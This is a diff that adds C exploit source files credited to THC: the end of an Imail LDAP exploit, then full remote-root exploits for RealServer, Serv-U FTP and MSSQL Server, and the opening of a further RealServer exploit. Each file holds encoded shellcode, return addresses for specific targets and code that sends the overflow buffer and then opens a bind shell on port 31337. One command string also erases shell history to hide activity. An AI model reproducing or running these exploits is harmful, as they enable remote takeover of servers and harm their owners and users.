+      printf("[*] Exploit send successfully ! Sleeping a while ....\n");
+      Sleep(1000);
+  }
+  else
+   printf("\nCan't connect to ldap port!\n");
+   
+  if(rc==0)
+  {
+   printf("[*] Trying to get a shell\n\n");
+   sock2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
+   mytcp.sin_port = htons(31337);
+   rc = connect(sock2, (struct sockaddr *)&mytcp, sizeof(mytcp));
+   if(rc!=0)
+   {
+     printf("can't connect to port 31337 ;( maybe firewalled ...\n");
+     exit(-1);
+   }
+   shell(sock2);
+  }
+
+  shutdown(sock,1);
+  closesocket(sock);
+
+  free(crapbuf1);
+  free(crapbuf2);
+  free(finalbuffer);  
+
+  exit(0);
+}
+ 
+void usage()
+{
+ unsigned int a;
+ printf("\nUsage:  <Host> <OS> <Imail Version>\n");
+ printf("Sample: THCimail 194.44.55.56 0 1\n\n");
+ printf("OS:\n");
+ printf("0 - Windows 2000 Server english all service packs\n");
+ printf("1 - Windows 2000 Professional german\n");
+ printf("2 - Windows XP SP1 german\n\n");
+ printf("Imail Version:\n");
+ printf("0 - Imail 6+7\n");
+ printf("1 - Imail 8\n");
+ exit(0);
+}
+
+void shell(int sock)
+{
+ int l;
+ char buf[1024];
+ struct timeval time;
+ unsigned long ul[2];
+
+ time.tv_sec = 1;
+ time.tv_usec = 0;
+
+ while (1)
+ {
+  ul[0] = 1;
+  ul[1] = sock;
+
+  l = select (0, (fd_set *)&ul, NULL, NULL, &time);
+  if(l == 1)
+  {  	
+   l = recv (sock, buf, sizeof (buf), 0);
+   if (l <= 0)
+   {
+    printf ("bye bye...\n");
+    return;
+   }
+  l = write (1, buf, l);
+   if (l <= 0)
+   {
+    printf ("bye bye...\n");
+    return;
+   }
+  }
+  else
+  {
+   l = read (0, buf, sizeof (buf));
+   if (l <= 0)
+   {
+    printf("bye bye...\n");
+    return;
+   }
+   l = send(sock, buf, l, 0);
+   if (l <= 0)
+   {
+    printf("bye bye...\n");
+    return;
+   }
+  }
+ }
+}

Exploits/THCrealbad.c

@@ -0,0 +1,311 @@
+/*****************************************************************************/
+/* THCREALbad 0.5 - Wind0wZ & Linux remote root exploit                      */
+/* Exploit by: Johnny Cyberpunk (jcyberpunk@thehackerschoice.com)            */
+/* THC PUBLIC SOURCE MATERIALS                                               */
+/*                                                                           */
+/* This exploit was an 0day from some time, but as CANVAS leaked and kiddies */
+/* exploited this bug like hell, realnetworks got info on that bug and posted*/
+/* a workaround on their site. So THC decided to release this one to the     */
+/* public now. Fuck u kiddies ! BURST IN HELL !                              */
+/*                                                                           *//*                                                                           */
+/* Also try the testing mode before exploitation of this bug, what OS is     */
+/* running on the remote site, to know what type of shellcode to use.        */
+/*                                                                           */
+/* Greetings go to Dave Aitel of Immunitysec who found that bug.             */
+/*                                                                           */
+/* compile with MS Visual C++ : cl THCREALbad.c                              */
+/*                                                                           */
+/* At least some greetz fly to : THC, Halvar Flake, FX, gera, MaXX, dvorak,  */
+/* scut, stealth, zip, zilvio, LSD and Dave Aitel                            */
+/*****************************************************************************/
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <winsock2.h>
+
+#define WINDOWS 0
+#define LINUX 1
+#define OSTESTMODE 2
+
+#pragma comment(lib, "ws2_32.lib")
+
+#define CMD "unset HISTFILE;uname -a;id;\n"
+
+char ostestmode[] = "OPTIONS / RTSP/1.0\r\n\r\n";
+ 
+char attackbuffer1[] =
+"DESCRIBE /"
+"../../../../../../../../../../../../../../../../../../../../"
+"../../../../../../../../../../../../../../../../../../../../"
+"../../../../../../../../../../../../../../../../../../../../"
+"../../../../../../../../../../../../../../../../../../../../"
+"../../../../../../../../../../../../../../../../../../../../"
+"../../../../../../../../../../../../../../../../../../../../"
+"../../../../../../../../../../../../../../../../../../../../"
+"../../../../../../../../../../../../../../../../../../../../"
+"../../../../../../../../../../../../../../../../../../../../"
+"../../../../../../../../../../../../../../../../../../../../"
+"../../../../../../../../../../../../../../../../../../../../"
+"../../../../../../../../../../../../../../../../../../../../"
+"../../../../../../../../../../../../../../../../../../../../"
+"../../../../../../../../../../../../../../../../../../../../"
+"../../../../../../../../../../../../../../../../../../../../"
+"../../../../../../../../../../../../../../../../../../../../"
+"../../../../../../../../../../../../../../../../../../../../"
+"../../../../../../../../../../../../../../../../../../../../"
+"../../../../../../../../../../../../../../../../../../../../"
+"../../../../../../../../../../../../../../../../../../../../"
+"../../../../../../../../../../../../../../../../../../../../"
+"../../../../../../../../../../../../../../../../../../../../"
+"../../../../../../../../../../../../../../../../../../../../"
+"../../../../../../../../../../../../../../../../../../../../"
+"../../../../../../../../../../../../../../../../../../../../"
+"../../../../../../../../../../../../../../../../../../../../";
+
+char attackbuffer2[] =
+".smi RTSP/1.0\r\n\r\n";
+
+char decoder[] =
+"\xcc\xcc\x90\x8b\xfd\x83\xc7\x37\x33\xc9\xb2\x90\x66\x81\xc1"
+"\x02\x02\x8a\x1f\x32\xda\x88\x1f\x47\xe2\xf7";
+
+char linuxshell[] =
+"\x32\xc3\x32\xd8\x32\xca\x52\xb2\x05\x52\xb2\x02\x52\xb2\x01"
+"\x52\x8a\xe2\xb0\x02\xb3\x65\xce\x83\x8a\xc2\x32\xc3\x32\xd8"
+"\x53\x53\x53\x65\x6b\x79\x6a\xb0\x01\x65\x50\x8a\xe1\xb0\x13"
+"\x50\xb0\x01\x51\x52\x8a\xc9\x8a\xe2\xb3\x65\xce\x83\x32\xd8"
+"\x3a\xc0\x77\x06\x32\xc3\x43\xce\x83\x32\xc3\x53\x51\x8a\xe2"
+"\xb0\x07\xb3\x65\xce\x83\x8a\xd4\x32\xc3\x32\xd8\x32\xca\xb0"
+"\x12\xb2\x02\xb3\x33\xce\x83\x32\xc3\x32\xd8\x53\x53\x54\x8a"
+"\xe2\xb0\x06\xb3\x65\xce\x83\x8a\xc5\x32\xc3\x32\xd8\xb3\x01"
+"\xce\x83\x3a\xc0\x76\x43\x32\xc3\x8a\xf8\xb3\x05\xce\x83\x32"
+"\xc3\x32\xca\x8a\xf0\xb3\x3d\xfd\xc3\xce\x83\x32\xc3\x42\xb3"
+"\x3d\xfd\xc3\xce\x83\x32\xc3\x42\xb3\x3d\xfd\xc3\xce\x83\x32"
+"\xc3\x53\x6b\x2c\x2c\x70\x6b\x6b\x2c\x61\x6a\x6d\x8a\xe0\x88"
+"\x57\x27\x0b\x53\x50\x8a\xe2\xb3\x08\xce\x83\x32\xc3\x43\xce"
+"\x83\x32\xc3\x8a\xf0\xb3\x05\xce\x83\xe8\x9a";
+
+char w32shell[] =
+"\x7b\xb3\xea\xf9\x92\x95\xfc\xc9\x68\x8d\x0c\x4e\x1c\x41\xdc"
+"\xe0\x44\x93\x60\xb7\xb0\xb0\xa0\x98\xc7\xc3\xa2\xcf\xa3\xa2"
+"\xbe\xd4\xdc\xdc\x91\x7b\x95\x78\x69\x6f\x6f\x6f\xcd\x13\x7d"
+"\xba\xfa\xa0\xc9\xf4\x1b\x91\x1b\xd0\x9c\x1b\xe0\x8c\x3d\x1b"
+"\xe8\x98\x1d\xcf\xac\x1b\x8b\x91\x6b\x1b\xcb\xe8\x91\x6b\x1b"
+"\xdb\x8c\x91\x69\x1b\xc3\xb4\x91\x6a\xc3\xc1\xc2\x1b\xcb\xb0"
+"\x91\x6b\xa1\x59\xd1\xa1\x50\x09\x1b\xa4\x1b\x91\x6e\x3c\xa1"
+"\x52\x41\x72\x14\x50\xe5\x67\x9f\x26\xd5\x95\x1d\xd4\xd5\x94"
+"\xf6\xa9\x80\xe5\x71\xf6\xa1\x80\xca\xc8\xce\xc6\xc0\xc2\xbb"
+"\xde\x80\xd1\x9f\x27\x9c\xda\x1b\x94\x18\x91\x68\x9f\x26\xdd"
+"\x95\x19\xd4\x1d\x48\x6e\xdd\x95\xe5\x2e\x6e\xdd\x94\xe4\xb1"
+"\x6e\xdd\xb2\x1d\xcd\x88\xc3\x6f\x40\x19\x57\xfa\x94\xc8\x18"
+"\xd5\x95\x10\xd5\xe7\x9a\x1d\xcd\xe4\x10\xfb\xb6\x84\x79\xe8"
+"\x6f\x6f\x6f\x19\x5e\xa1\x4b\xc3\xc3\xc3\xc3\xc6\xd6\xc6\x6f"
+"\x40\x07\xc5\xc8\xf6\x19\xa0\xfa\x80\xc5\xc7\x6f\xc5\x44\xde"
+"\xc6\xc7\x6f\xc5\x5c\xc3\xc5\xc7\x6f\xc5\x40\x07\x1d\xd5\x18"
+"\xc0\x6f\xc5\x74\xc5\xc5\x6f\xc5\x78\x1d\xd4\x95\x9c\x04\xc3"
+"\xf8\xbe\xf5\xe8\xf5\xf8\xcc\xf3\xfd\xf4\x04\xa1\x42\x1d\xd5"
+"\x5c\x04\xc7\xc7\xc7\xc3\xc3\x6e\x56\x91\x62\xc2\x04\x1d\xd5"
+"\xe8\xc0\x1d\xd5\x18\xc0\x21\x98\xc3\xc3\xfa\x80\x6e\x5e\xc2"
+"\xc3\xc3\xc3\xc5\x6f\xc5\x7c\xfa\x6f\x6f\xc5\x70";
+
+void usage();
+void shell(int sock);
+
+int main(int argc, char *argv[])
+{  
+  unsigned short realport=554;
+  unsigned int sock,addr,os,rc;
+  unsigned char *finalbuffer,*osbuf;
+  struct sockaddr_in mytcp;
+  struct hostent * hp;
+  WSADATA wsaData;
+
+  printf("\nTHCREALbad v0.5 - Wind0wZ & Linux remote root sploit for Realservers 8+9\n");
+  printf("by Johnny Cyberpunk (jcyberpunk@thehackerschoice.com)\n");
+
+  if(argc<3 || argc>3)
+   usage();
+
+  finalbuffer = malloc(2000);
+  memset(finalbuffer,0,2000);
+  
+  strcpy(finalbuffer,attackbuffer1);
+  os = (unsigned short)atoi(argv[2]);
+  switch(os)
+  {
+   case WINDOWS:
+    decoder[11]=0x90;
+    break;
+   case LINUX:
+    decoder[11]=0x03;
+    break;
+   case OSTESTMODE:
+    break;
+   default:
+    printf("\nillegal OS value!\n");
+    exit(-1);
+  }
+
+  strcat(finalbuffer,decoder);
+  
+  if(os==WINDOWS)
+    strcat(finalbuffer,w32shell);
+  else
+    strcat(finalbuffer,linuxshell);
+
+  strcat(finalbuffer,attackbuffer2);
+
+  if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0)
+  {
+   printf("WSAStartup failed !\n");
+   exit(-1);
+  }
+  
+  hp = gethostbyname(argv[1]);
+
+  if (!hp){
+   addr = inet_addr(argv[1]);
+  }
+  if ((!hp)  && (addr == INADDR_NONE) )
+  {
+   printf("Unable to resolve %s\n",argv[1]);
+   exit(-1);
+  }
+
+  sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
+  if (!sock)
+  { 
+   printf("socket() error...\n");
+   exit(-1);
+  }
+  
+  if (hp != NULL)
+   memcpy(&(mytcp.sin_addr),hp->h_addr,hp->h_length);
+  else
+   mytcp.sin_addr.s_addr = addr;
+
+  if (hp)
+   mytcp.sin_family = hp->h_addrtype;
+  else
+   mytcp.sin_family = AF_INET;
+
+  mytcp.sin_port=htons(realport);
+
+  rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct sockaddr_in));
+  if(rc==0)
+  {
+    if(os==OSTESTMODE)
+    {
+     send(sock,ostestmode,sizeof(ostestmode),0);
+     Sleep(1000);
+     osbuf = malloc(2000);
+     memset(osbuf,0,2000);
+     recv(sock,osbuf,2000,0);
+     if(*osbuf != '\0')
+       for(; *osbuf != '\0';)
+       {
+         if((isascii(*osbuf) != 0) && (isprint(*osbuf) != 0))
+         {
+   	  if(*osbuf == '\x53' && *(osbuf + 1) == '\x65' && *(osbuf + 2) == '\x72' && *(osbuf + 3) == '\x76' && *(osbuf + 4) == '\x65' && *(osbuf + 5) == '\x72')
+          {
+	     osbuf += 7;
+	       printf("\nDetected OS: ");
+	       while(*osbuf != '\n')
+	         printf("%c", *osbuf++);
+	       printf("\n");
+	       break;
+   	   }
+         }
+         osbuf++;
+       } 
+     free(osbuf);
+    }
+    else
+    {
+     send(sock,finalbuffer,2000,0);
+     printf("\nexploit send .... sleeping a while ....\n\n");
+     Sleep(1000);
+    }
+  }
+  else
+   printf("can't connect to realserver port!\n");
+  
+  shutdown(sock,1);
+  closesocket(sock);
+  free(finalbuffer);
+  if(os==OSTESTMODE)
+   exit(0);
+
+  sock = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
+  mytcp.sin_port = htons(31337);
+  rc = connect(sock, (struct sockaddr *)&mytcp, sizeof(mytcp));
+  if(rc!=0)
+  {
+   printf("can't connect to port 31337 ;( maybe firewalled ...\n");
+   exit(-1);
+  }
+  if(os==LINUX)
+   send(sock,CMD,sizeof(CMD),0);
+  shell(sock);
+  exit(0);
+}
+ 
+void usage()
+{
+ unsigned int a;
+ printf("\nUsage:  <Host> <OS>\n");
+ printf("0 = Wind0wZ\n");
+ printf("1 = Linux\n");
+ printf("2 = OS Test Mode\n");
+ exit(0);
+}
+
+void shell(int sock)
+{
+ int l;
+ char buf[1024];
+ struct timeval time;
+ unsigned long ul[2];
+
+ time.tv_sec = 1;
+ time.tv_usec = 0;
+
+ while (1)
+ {
+  ul[0] = 1;
+  ul[1] = sock;
+
+  l = select (0, (fd_set *)&ul, NULL, NULL, &time);
+  if(l == 1)
+  {  	
+   l = recv (sock, buf, sizeof (buf), 0);
+   if (l <= 0)
+   {
+    printf ("bye bye...\n");
+    return;
+   }
+  l = write (1, buf, l);
+   if (l <= 0)
+   {
+    printf ("bye bye...\n");
+    return;
+   }
+  }
+  else
+  {
+   l = read (0, buf, sizeof (buf));
+   if (l <= 0)
+   {
+    printf("bye bye...\n");
+    return;
+   }
+   l = send(sock, buf, l, 0);
+   if (l <= 0)
+   {
+    printf("bye bye...\n");
+    return;
+   }
+  }
+ }
+}

Exploits/THCservu.c

@@ -0,0 +1,320 @@
+/*****************************************************************************/
+/* THCservu 0.1 - Wind0wZ remote root exploit                                */
+/* Exploit by: Johnny Cyberpunk (jcyberpunk@thc.org)                         */
+/* THC PUBLIC SOURCE MATERIALS                                               */
+/*                                                                           */
+/* Credits go to kkqq@0x557.org who found that bug.                          */
+/* his Advisory: http://www.0x557.org/release/servu.txt                      */
+/*                                                                           */
+/* compile with MS Visual C++ : cl THCservu.c                                */
+/*                                                                           */
+/* At least some greetz fly to : THC, Halvar Flake, FX, gera, MaXX, dvorak,  */
+/* scut, stealth, FtR and Random                                             */
+/*****************************************************************************/
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <winsock2.h>
+
+#pragma comment(lib, "ws2_32.lib")
+
+char *WIN2KEN   = "\xc4\x2a\x02\x75";
+char *WIN2KPG   = "\xc4\x2a\xf9\x74";
+char *WINXPSP1G = "\x61\x24\xa0\x71";
+
+#define jumper    "\xeb\x06\x4a\x43"
+
+char shellcode[] =
+"\x8b\x7c\x24\xfc\x83\xc7\x21\x33\xc9\xb2\x8f\x66\x81\xc1\x02"
+"\x02\x8a\x1f\x32\xda\x88\x1f\x47\xe2\xf7\x64\xac\xf5\xe6\x8d"
+"\x8a\xe3\xd6\x77\x92\x13\x51\x03\x5e\xc3\xff\x5b\x8c\x7f\xa8"
+"\xaf\xaf\xbf\x87\xd8\xdc\xbd\xd0\xbc\xbd\xa1\xcb\xc3\xc3\x8e"
+"\x64\x8a\x67\x76\x70\x70\x70\xd2\x0c\x62\xa5\xe5\xbf\xd6\xeb"
+"\x04\x8e\x04\xcf\x83\x04\xff\x93\x22\x04\xf7\x87\x02\xd0\xb3"
+"\x04\x94\x8e\x74\x04\xd4\xf7\x8e\x74\x04\xc4\x93\x8e\x76\x04"
+"\xdc\xab\x8e\x75\xdc\xde\xdd\x04\xd4\xaf\x8e\x74\xbe\x46\xce"
+"\xbe\x4f\x16\x04\xbb\x04\x8e\x71\x23\xbe\x4d\x5e\x6d\x0b\x4f"
+"\xfa\x78\x80\x39\xca\x8a\x02\xcb\xca\x8b\xe9\xb6\x9f\xfa\x6e"
+"\xe9\xbe\x9f\xd5\xd7\xd1\xd9\xdf\xdd\xa4\xc1\x9f\xce\x80\x38"
+"\x83\xc5\x04\x8b\x07\x8e\x77\x80\x39\xc2\x8a\x06\xcb\x02\x57"
+"\x71\xc2\x8a\xfa\x31\x71\xc2\x8b\xfb\xae\x71\xc2\xad\x02\xd2"
+"\x97\xdc\x70\x5f\x06\x48\xe5\x8b\xd7\x07\xca\x8a\x0f\xca\xf8"
+"\x85\x02\xd2\xfb\x0f\xe4\xa9\x9b\x66\xf7\x70\x70\x70\x06\x41"
+"\xbe\x54\xdc\xdc\xdc\xdc\xd9\xc9\xd9\x70\x5f\x18\xda\xd7\xe9"
+"\x06\xbf\xe5\x9f\xda\xd8\x70\xda\x5b\xc1\xd9\xd8\x70\xda\x43"
+"\xdc\xda\xd8\x70\xda\x5f\x18\x02\xca\x07\xdf\x70\xda\x6b\xda"
+"\xda\x70\xda\x67\x02\xcb\x8a\x83\x1b\xdc\xe7\xa1\xea\xf7\xea"
+"\xe7\xd3\xec\xe2\xeb\x1b\xbe\x5d\x02\xca\x43\x1b\xd8\xd8\xd8"
+"\xdc\xdc\x71\x49\x8e\x7d\xdd\x1b\x02\xca\xf7\xdf\x02\xca\x07"
+"\xdf\x3e\x87\xdc\xdc\xe5\x9f\x71\x41\xdd\xdc\xdc\xdc\xda\x70"
+"\xda\x63\xe5\x70\x70\xda\x6f";
+
+
+void usage();
+void shell(int sock);
+
+int main(int argc, char *argv[])
+{  
+  unsigned short servuport;
+  unsigned int i,sock,sock2,addr,os,rc,rc2,dirlen,craplen=400;
+  unsigned char *user,*pass,*chmod,*recvbuf,*finalbuffer,*crapbuf,*directory;
+  unsigned char *temp;
+  struct sockaddr_in mytcp;
+  struct hostent * hp;
+  WSADATA wsaData;
+
+  printf("\nTHCservu v0.1 - Servu 4.x sample exploit for the paper\n");
+  printf("Practical SEH exploitation - by Johnny Cyberpunk (jcyberpunk@thc.org)\n");
+
+  if(argc<7 || argc>7)
+   usage();
+
+  user = malloc(256);
+  memset(user,0,256);
+
+  pass = malloc(256);
+  memset(pass,0,256);
+  
+  chmod = malloc(128);
+  memset(chmod,0,128);
+
+  directory = malloc(256);
+  memset(directory,0,256);
+
+  crapbuf = malloc(512);
+  memset(crapbuf,0,512);
+
+  recvbuf = malloc(256);
+  memset(recvbuf,0,256);
+
+  finalbuffer = malloc(1000);
+  memset(finalbuffer,0,1000);
+
+  printf("\n[*] building buffer\n");
+
+  sprintf(user,"user %s\r\n",argv[3]);
+  sprintf(pass,"pass %s\r\n",argv[4]);
+  strcpy(chmod,"site chmod 666 ");
+
+  temp=malloc(256);
+  memset(temp,0,256);
+  
+  dirlen=strlen(argv[5]);
+  temp=argv[5];
+  if((strncmp("\\",temp,1))!=0)
+  {
+   printf("\nGimme valid path name, ie. \\upload\n");
+   exit(-1);
+  }
+  
+  if(dirlen!=1)
+   dirlen-=3;
+  else
+   dirlen-=4;
+    
+  craplen=craplen-dirlen;
+  
+  for(i=0;i<craplen;i++)
+   crapbuf[i]='X';
+
+  strcat(finalbuffer,chmod);
+  strcat(finalbuffer,crapbuf);
+  strcat(finalbuffer,jumper);
+
+  os = (unsigned short)atoi(argv[6]);  
+  switch(os)
+  {
+   case 0:
+    strcat(finalbuffer,WIN2KPG);
+    break;
+   case 1:
+    strcat(finalbuffer,WIN2KPG);
+    break;
+   case 2:
+    strcat(finalbuffer,WINXPSP1G);
+    break;
+   default:
+    printf("\nYou entered an illegal target !\n\n");
+    usage();
+    exit(-1);
+  }
+
+  strcat(finalbuffer,shellcode);
+  strcat(finalbuffer,"\r\n");
+      
+  if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0)
+  {
+   printf("WSAStartup failed !\n");
+   exit(-1);
+  }
+  
+  hp = gethostbyname(argv[1]);
+
+  if (!hp){
+   addr = inet_addr(argv[1]);
+  }
+  if ((!hp)  && (addr == INADDR_NONE) )
+  {
+   printf("Unable to resolve %s\n",argv[1]);
+   exit(-1);
+  }
+
+  sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
+  if (!sock)
+  { 
+   printf("socket() error...\n");
+   exit(-1);
+  }
+  
+  if (hp != NULL)
+   memcpy(&(mytcp.sin_addr),hp->h_addr,hp->h_length);
+  else
+   mytcp.sin_addr.s_addr = addr;
+
+  if (hp)
+   mytcp.sin_family = hp->h_addrtype;
+  else
+   mytcp.sin_family = AF_INET;
+
+  servuport=atoi(argv[2]);
+  mytcp.sin_port=htons(servuport);
+
+  printf("[*] connecting the target\n");
+
+  rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct sockaddr_in));
+  if(rc==0)
+  {
+     rc2=recv(sock,recvbuf,256,0);
+     printf("[*] sending username\n");
+     send(sock,user,256,0);
+     rc2=recv(sock,recvbuf,256,0);
+     printf("[*] sending password\n");
+     send(sock,pass,256,0);
+     rc2=recv(sock,recvbuf,256,0);
+     if(rc2<0)
+     {
+      printf("\nError while recv() data!\n");
+      exit(-1);
+     }
+     else if (memcmp(recvbuf,"530 ",4) == 0)
+     {
+      printf("\nWrong user/pass !\n");
+      exit(-1);
+     }
+     else
+     {
+      _snprintf(directory,127,"cwd %s\r\n",argv[5]);
+      send(sock,directory,256,0);
+      rc2=recv(sock,recvbuf,256,0);
+      if (memcmp(strupr(recvbuf),"550 ",4) == 0)
+      {
+       printf("\nError changing to path %s\n",argv[5]);
+       exit(-1);
+      }
+      
+      send(sock,finalbuffer,2000,0);
+      printf("[*] Exploit send successfully ! Sleeping a while ....\n");
+      Sleep(1000);
+     }
+  }
+  else
+   printf("\nCan't connect to ftp port!\n");
+   
+  if(rc==0)
+  {
+   printf("[*] Trying to get a shell\n\n");
+   sock2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
+   mytcp.sin_port = htons(31337);
+   rc = connect(sock2, (struct sockaddr *)&mytcp, sizeof(mytcp));
+   if(rc!=0)
+   {
+    rc2=recv(sock,recvbuf,256,0);
+    if (memcmp (recvbuf, "550 ", 4) == 0)
+    {
+     printf("\nYou don't have permissions to upload!\n");
+     exit(-1);
+    }
+    else  	
+    {   	
+     printf("can't connect to port 31337 ;( maybe firewalled ...\n");
+     exit(-1);
+    }
+   }
+   shell(sock2);
+  }
+
+  shutdown(sock,1);
+  closesocket(sock);
+
+  free(user);
+  free(pass);
+  free(chmod);
+  free(directory);
+  free(crapbuf);
+  free(finalbuffer);  
+  free(recvbuf);
+
+  exit(0);
+}
+ 
+void usage()
+{
+ unsigned int a;
+ printf("\nUsage:  <Host> <Port> <Username> <Password> <Directory> <Target>\n");
+ printf("Sample: THCservu 194.44.55.56 21 lamer test123 \\upload 0\n");
+ printf("Targets:\n");
+ printf("0 - Windows 2000 Server english all service packs\n");
+ printf("1 - Windows 2000 Professional german\n");
+ printf("2 - Windows XP SP1 german\n");
+ exit(0);
+}
+
+void shell(int sock)
+{
+ int l;
+ char buf[1024];
+ struct timeval time;
+ unsigned long ul[2];
+
+ time.tv_sec = 1;
+ time.tv_usec = 0;
+
+ while (1)
+ {
+  ul[0] = 1;
+  ul[1] = sock;
+
+  l = select (0, (fd_set *)&ul, NULL, NULL, &time);
+  if(l == 1)
+  {  	
+   l = recv (sock, buf, sizeof (buf), 0);
+   if (l <= 0)
+   {
+    printf ("bye bye...\n");
+    return;
+   }
+  l = write (1, buf, l);
+   if (l <= 0)
+   {
+    printf ("bye bye...\n");
+    return;
+   }
+  }
+  else
+  {
+   l = read (0, buf, sizeof (buf));
+   if (l <= 0)
+   {
+    printf("bye bye...\n");
+    return;
+   }
+   l = send(sock, buf, l, 0);
+   if (l <= 0)
+   {
+    printf("bye bye...\n");
+    return;
+   }
+  }
+ }
+}

Exploits/THCsql.c

@@ -0,0 +1,140 @@
+/*****************************************************************************/
+/* THCsql 0.1 - MSSQL Server exploit for Server < SP3                        */
+/* Exploit by: Johnny Cyberpunk (jcyberpunk@thehackerschoice.com)            */
+/* THC PUBLIC SOURCE MATERIALS                                               */
+/*                                                                           */
+/* The exploit can be freely distributed !                                   */
+/*                                                                           */
+/* This is just another exploit for the well known mssql server bug which    */
+/* was found by David Litchfield last summer. Details in this advisory:      */
+/*           http://www.nextgenss.com/advisories/mssql-udp.txt               */
+/*                                                                           */
+/* This exploit was tested on an english Windows 2k Server SP2 and MSSQL     */
+/* Server with SP0 and SP2 and has worked properly. The used shellcode is    */
+/* completely offsetless, which makes this exploit quite stable              */
+/*                                                                           */
+/* After successful exploitation of this bug, a commandshell should spawn on */
+/* TCP port 31337 ! Use netcat to connect to this port !                     */
+/*                                                                           */
+/* If there's no connectable port 31337, maybe it's blocked by a firewall !  */
+/*                                                                           */
+/* compile with MS Visual C++ : cl THCsql.c /link ws2_32.lib                 */
+/*                                                                           */
+/* At least some greetz fly to : THC, Halvar Flake, FX, gera, MaXX, dvorak,  */
+/* scut, stealth, zip, zilvio and the rest of the combo ......               */
+/*****************************************************************************/
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <winsock2.h>
+
+char badbuffer[] =
+"\x04"
+"THCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHC"
+"THCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHC"
+"\xdc\xc9\xb0\x42"
+"\xeb\x0e"
+"JC"
+"THC!"
+"\x01\x70\xae\x42"
+"\x01\x70\xae\x42"
+"\x8b\xfc\x83\xc7\x2c\x66\x81\xec\x04\x02\x33\xc9\xb2\x35\x66"
+"\x81\xc1\x38\x01\x8a\x1f\x32\xda\x88\x1f\x47\xe2\xf7\xde\x16"
+"\x4f\x5c\x37\x30\x59\x6c\xcd\x28\xa9\xeb\xb9\xe4\x79\x45\xe1"
+"\x36\xc5\x12\x15\x15\x05\x3d\x62\x66\x07\x6a\x06\x07\x1b\x71"
+"\x79\x79\x34\xde\x30\xdd\xcc\xca\xca\xca\x68\xb6\xd8\x1f\x5f"
+"\x05\x6c\x51\xbe\x34\xbe\x75\x39\xbe\x45\x29\x98\xbe\x4d\x3d"
+"\xb8\x6a\x09\xbe\x2e\x34\xce\xbe\x6e\x4d\x34\xce\xbe\x7e\x29"
+"\x34\xcc\xbe\x66\x11\x34\xcf\x66\x64\x67\xbe\x6e\x15\x34\xce"
+"\x04\xfc\x74\x04\xf5\xac\xbe\x01\xbe\x34\xcb\x99\x04\xf7\xe4"
+"\xd7\xb1\xf5\x40\xc2\x3a\x83\x70\x30\xb8\x71\x70\x31\x53\x0c"
+"\x25\x40\xd4\x53\x04\x25\x6f\x6d\x6b\x63\x65\x67\x1e\x7b\x25"
+"\x74\x3a\x82\x39\x7f\xbe\x31\xbd\x34\xcd\x3a\x83\x78\x30\xbc"
+"\x71\xb8\xed\xcb\x78\x30\x40\x8b\xcb\x78\x31\x41\x14\xcb\x78"
+"\x17\xb8\x68\x2d\x66\xca\xe5\xbc\xf2\x5f\x31\x6d\xbd\x70\x30"
+"\xb5\x70\x42\x3f\xb8\x68\x41\xb5\x5e\x13\x21\xdc\x4d\xca\xca"
+"\xca\xbc\xfb\x04\xee\x66\x66\x66\x66\x63\x73\x63\xca\xe5\xa2"
+"\x60\x6d\x53\xbc\x05\x5f\x25\x60\x62\xca\x60\xe1\x7b\x63\x62"
+"\xca\x60\xf9\x66\x60\x62\xca\x60\xe5\xa2\xb8\x70\xbd\x65\xca"
+"\x60\xd1\x60\x60\xca\x60\xdd\xb8\x71\x30\x39\xa1\x66\x5d\x1b"
+"\x50\x4d\x50\x5d\x69\x56\x58\x51\xa1\x04\xe7\xb8\x70\xf9\xa1"
+"\x62\x62\x62\x66\x66\xcb\xf3\x34\xc7\x67\xa1\xb8\x70\x4d\x65"
+"\xb8\x70\xbd\x65\x84\x3d\x66\x66\x5f\x25\xcb\xfb\x67\x66\x66"
+"\x66\x60\xca\x60\xd9\x5f\xca\xca\x60\xd5";
+
+void usage();
+
+int main(int argc, char *argv[])
+{  
+  unsigned short sqlport=1434;
+  unsigned int sock,addr,rc;
+  struct sockaddr_in sqludp;
+  struct hostent * hp;
+  WSADATA wsaData;
+
+  printf("\nTHCsql v0.1 - Wind0wZ remote root sploit for MSSQL-Servers < SP3\n");
+  printf("by Johnny Cyberpunk (jcyberpunk@thehackerschoice.com)\n");
+  printf("bug was found by David Litchfield\n");
+  
+  if(argc<2)
+   usage();
+   
+    if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0)
+  {
+   printf("WSAStartup failed !\n");
+   exit(-1);
+  }
+  
+  hp = gethostbyname(argv[1]);
+
+  if (!hp){
+   addr = inet_addr(argv[1]);
+  }
+  if ((!hp)  && (addr == INADDR_NONE) )
+  {
+   printf("Unable to resolve %s\n",argv[1]);
+   exit(-1);
+  }
+
+  sock=socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP);
+  if (!sock)
+  { 
+   printf("socket() error...\n");
+   exit(-1);
+  }
+  
+  if (hp != NULL)
+   memcpy(&(sqludp.sin_addr),hp->h_addr,hp->h_length);
+  else
+   sqludp.sin_addr.s_addr = addr;
+
+  if (hp)
+   sqludp.sin_family = hp->h_addrtype;
+  else
+   sqludp.sin_family = AF_INET;
+
+  sqludp.sin_port=htons(sqlport);
+ 
+  rc=connect(sock, (struct sockaddr *) &sqludp, sizeof (struct sockaddr_in));
+  if(rc==0)
+  {
+    send(sock,badbuffer,sizeof(badbuffer)-1,0);
+    printf("\nexploit send .... sleeping a while ....\n");
+    Sleep(1000);
+    printf("\nok ... now try to connect to port 31337 via netcat !\n");
+  }
+  else
+   printf("can't connect to sql port udp 1434!\n");
+  
+  shutdown(sock,1);
+  closesocket(sock);
+  exit(0);
+}
+
+void usage()
+{
+ unsigned int a;
+ printf("\nUsage:  <Host>\n");
+ exit(0);
+}

Exploits/THCunREAL.c

@@ -0,0 +1,151 @@
+/*****************************************************************************/
